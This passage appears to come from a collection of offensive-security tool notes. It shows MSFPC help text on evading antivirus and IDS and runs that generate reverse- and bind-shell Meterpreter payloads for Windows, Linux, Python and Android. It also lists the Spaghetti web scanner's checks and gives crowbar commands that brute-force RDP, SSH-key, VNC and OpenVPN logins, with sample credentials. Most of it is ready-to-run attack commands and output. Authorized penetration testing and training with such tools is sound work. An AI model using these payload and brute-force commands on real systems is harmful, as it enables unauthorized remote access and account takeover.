 Missing <STAGED/STAGELESS> will default to <STAGED> where possible.
   Note: Metasploit doesn't (yet!) support <STAGED/STAGELESS> for every <TYPE> format.
<STAGED> are 'better' in low-bandwidth/high-latency environments.
<STAGELESS> are seen as 'stealthier' when bypassing Anti-Virus protections. <STAGED> may work 'better' with IDS/IPS.
 More information: https://community.rapid7.com/community/metasploit/blog/2015/03/25/stageless-meterpreter-payloads
                   https://www.offensive-security.com/metasploit-unleashed/payload-types/
                   https://www.offensive-security.com/metasploit-unleashed/payloads/

<TCP> is the standard method to connecting back. This is the most compatible with TYPES as its RAW. Can be easily detected on IDSs.
<HTTP> makes the communication appear to be HTTP traffic (unencrypted). Helpful for packet inspection, which limit port access on protocol - e.g. TCP 80.
<HTTPS> makes the communication appear to be (encrypted) HTTP traffic using as SSL. Helpful for packet inspection, which limit port access on protocol - e.g. TCP 443.
<FIND_PORT> will attempt every port on the target machine, to find a way out. Useful with stick ingress/engress firewall rules. Will switch to 'allports' based on <TYPE>.
 Missing <TCP/HTTP/HTTPS/FIND_PORT> will default to <TCP>.
 By altering the traffic, such as <HTTP> and even more <HTTPS>, it will slow down the communication & increase the payload size.
 More information: https://community.rapid7.com/community/metasploit/blog/2011/06/29/meterpreter-httphttps-communication

<BATCH> will generate as many combinations as possible: <TYPE>, <CMD + MSF>, <BIND + REVERSE>, <STAGED + STAGLESS> & <TCP + HTTP + HTTPS + FIND_PORT>
<LOOP> will just create one of each <TYPE>.

<VERBOSE> will display more information.
$

$ bash msfpc.sh windows 192.168.1.10
 [*] MSFvenom Payload Creator (MSFPC v1.4.4)
 [i]   IP: 192.168.1.10
 [i] PORT: 443
 [i] TYPE: windows (windows/meterpreter/reverse_tcp)
 [i]  CMD: msfvenom -p windows/meterpreter/reverse_tcp -f exe \
  --platform windows -a x86 -e generic/none LHOST=192.168.1.10 LPORT=443 \
> '/root/windows-meterpreter-staged-reverse-tcp-443.exe'

 [i] windows meterpreter created: '/root/windows-meterpreter-staged-reverse-tcp-443.exe'

 [i] MSF handler file: '/root/windows-meterpreter-staged-reverse-tcp-443-exe.rc'
 [i] Run: msfconsole -q -r '/root/windows-meterpreter-staged-reverse-tcp-443-exe.rc'
 [?] Quick web server (for file transfer)?: python2 -m SimpleHTTPServer 8080
 [*] Done!
$

$ ./msfpc.sh elf bind eth0 4444 verbose
 [*] MSFvenom Payload Creator (MSFPC v1.4.4)
 [i]        IP: 192.168.103.142
 [i]      PORT: 4444
 [i]      TYPE: linux (linux/x86/shell/bind_tcp)
 [i]     SHELL: shell
 [i] DIRECTION: bind
 [i]     STAGE: staged
 [i]    METHOD: tcp
 [i]       CMD: msfvenom -p linux/x86/shell/bind_tcp -f elf \
  --platform linux -a x86 -e generic/none  LPORT=4444 \
> '/root/linux-shell-staged-bind-tcp-4444.elf'

 [i] linux shell created: '/root/linux-shell-staged-bind-tcp-4444.elf'

 [i] File: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, corrupted section header size
 [i] Size: 4.0K
 [i]  MD5: eed4623b765eea623f2e0206b63aad61
 [i] SHA1: 0b5dabd945ef81ec9283768054b3c22125aa9185

 [i] MSF handler file: '/root/linux-shell-staged-bind-tcp-4444-elf.rc'
 [i] Run: msfconsole -q -r '/root/linux-shell-staged-bind-tcp-4444-elf.rc'
 [?] Quick web server (for file transfer)?: python2 -m SimpleHTTPServer 8080
 [*] Done!
$

$ msfpc stageless cmd py tcp
 [*] MSFvenom Payload Creator (MSFPC v1.4.4)

 [i] Use which interface - IP address?:
 [i]   1.) eth0 - 192.168.103.142
 [i]   2.) lo - 127.0.0.1
 [i]   3.) wan - 31.204.154.174
 [?] Select 1-3, interface or IP address: 1

 [i]   IP: 192.168.103.142
 [i] PORT: 443
 [i] TYPE: python (python/shell_reverse_tcp)
 [i]  CMD: msfvenom -p python/shell_reverse_tcp -f raw \
  --platform python -e generic/none -a python LHOST=192.168.103.142 LPORT=443 \
> '/root/python-shell-stageless-reverse-tcp-443.py'

 [i] python shell created: '/root/python-shell-stageless-reverse-tcp-443.py'

 [i] MSF handler file: '/root/python-shell-stageless-reverse-tcp-443-py.rc'
 [i] Run: msfconsole -q -r '/root/python-shell-stageless-reverse-tcp-443-py.rc'
 [?] Quick web server (for file transfer)?: python2 -m SimpleHTTPServer 8080
 [*] Done!
$

$ ./msfpc.sh loop wan
 [*] MSFvenom Payload Creator (MSFPC v1.4.4)
 [i] Loop Mode. Creating one of each TYPE, with default values

 [*] MSFvenom Payload Creator (MSFPC v1.4.4)
 [i]   IP: xxx.xxx.xxx.xxx
 [i] PORT: 443
 [i] TYPE: android (android/meterpreter/reverse_tcp)
 [i]  CMD: msfvenom -p android/meterpreter/reverse_tcp \
  LHOST=xxx.xxx.xxx.xxx LPORT=443 \
> '/root/android-meterpreter-stageless-reverse-tcp-443.apk'

 [i] android meterpreter created: '/root/android-meterpreter-stageless-reverse-tcp-443.apk'

 [i] MSF handler file: '/root/android-meterpreter-stageless-reverse-tcp-443-apk.rc'
 [i] Run: msfconsole -q -r '/root/android-meterpreter-stageless-reverse-tcp-443-apk.rc'
 [?] Quick web server (for file transfer)?: python2 -m SimpleHTTPServer 8080
 [*] Done!


 [*] MSFvenom Payload Creator (MSFPC v1.4.4)

...SNIP...

 [*] Done!

$

$ git clone https://github.com/m4ll0k/Spaghetti.git
$ cd Spaghetti 
$ pip install -r requirements.txt
$ python spaghetti.py --help

• Fingerprints
  • Server
  • Web Frameworks (CakePHP,CherryPy,Django,...)
  • Web Application Firewall (Waf) (Cloudflare,AWS,Barracuda,...)
  • Content Management System (CMS) (Drupal,Joomla,Wordpress,Magento)
  • Operating System (Linux,Unix,Windows,...)
  • Language (PHP,Ruby,Python,ASP,...)

Example: python spaghetti.py --url target.com --scan 0 --random-agent --verbose

• Discovery:
  
  • Apache
    
    • Apache (mod_userdir)
    • Apache (mod_status)
    • Apache multiviews
    • Apache xss
  • Broken Auth./Session Management
    
    • Admin Panel
    • Backdoors
    • Backup Directory
    • Backup File
    • Common Directory
    • Common File
    • Log File
  • Disclosure
    
    • Emails
    • IP
  • Injection
    
    • HTML
    • SQL
    • LDAP
    • XPath
    • XSS
    • RFI
    • PHP Code
  • Other
    
    • Allow Methods
    • HTML Object
    • Multiple Index
    • Robots Paths
    • Cookie Security
  • Vulns
    
    • ShellShock
    • Struts-Shock

Example: python spaghetti.py --url target.com --scan 1 --random-agent --verbose

• OpenVPN (-b openvpn)
• Remote Desktop Protocol (RDP) with NLA support (-b rdp)
• SSH private key authentication (-b sshkey)
• VNC key authentication (-b vpn)

# apt-get -y install openvpn freerdp-x11 vncviewer

# git clone https://github.com/galkan/crowbar

• Debian 7/8 & Kali 1/2 uses freerdp-x11 package.
• Else you can try xfreerdp.
• Else you may need to compile & tweak freerdp by following: http://opentechnotes.blogspot.co.uk/2015/02/compile-headless-freerdp-credential-checking.html

# ./crowbar.py -b rdp -u DOMAIN\\gokhan alkan -c Aa123456 -s 10.68.35.150/32
2015-03-28 11:03:39 RDP-SUCCESS : 10.68.35.150:3389 - "DOMAIN\gokhan alkan":Aa123456,

# ./crowbar.py -b rdp -u gokhan alkan@ornek -c Aa123456 -s 10.68.35.150/32
2015-03-28 11:04:00 RDP-SUCCESS : 10.68.35.150:3389 - "gokhan alkan@DOMAIN":Aa123456,

# ./crowbar.py -b rdp -s 192.168.2.182/32 -u admin -c Aa123456

# ./crowbar.py -b rdp -s 192.168.2.211/32 -U /root/Desktop/userlist -c passw0rd

# ./crowbar.py -b rdp -s 192.168.2.250/32 -u localuser -C /root/Desktop/passlist

# ./crowbar.py -b rdp -s 192.168.2.0/24 -U /root/Desktop/userlist -C /root/Desktop/passlist -d

# ./crowbar.py -b sshkey -s 192.168.2.105/32 -u root -k /root/.ssh/id_rsa

# ./crowbar.py -b sshkey -s 192.168.2.105/32 -u root -k /root/.ssh/

# ./crowbar.py -b sshkey -s 192.168.2.0/24 -u root -k /root/.ssh/ -d

# ./crowbar.py -b vnckey -s 192.168.2.105/32 -p 5902 -k /root/.vnc/passwd

# ./crowbar.py -b openvpn -s 198.7.62.204/32 -p 443 -m /root/Desktop/vpnbook.ovpn -k /root/Desktop/vpnbook_ca.crt -u vpnbook -c cr2hudaF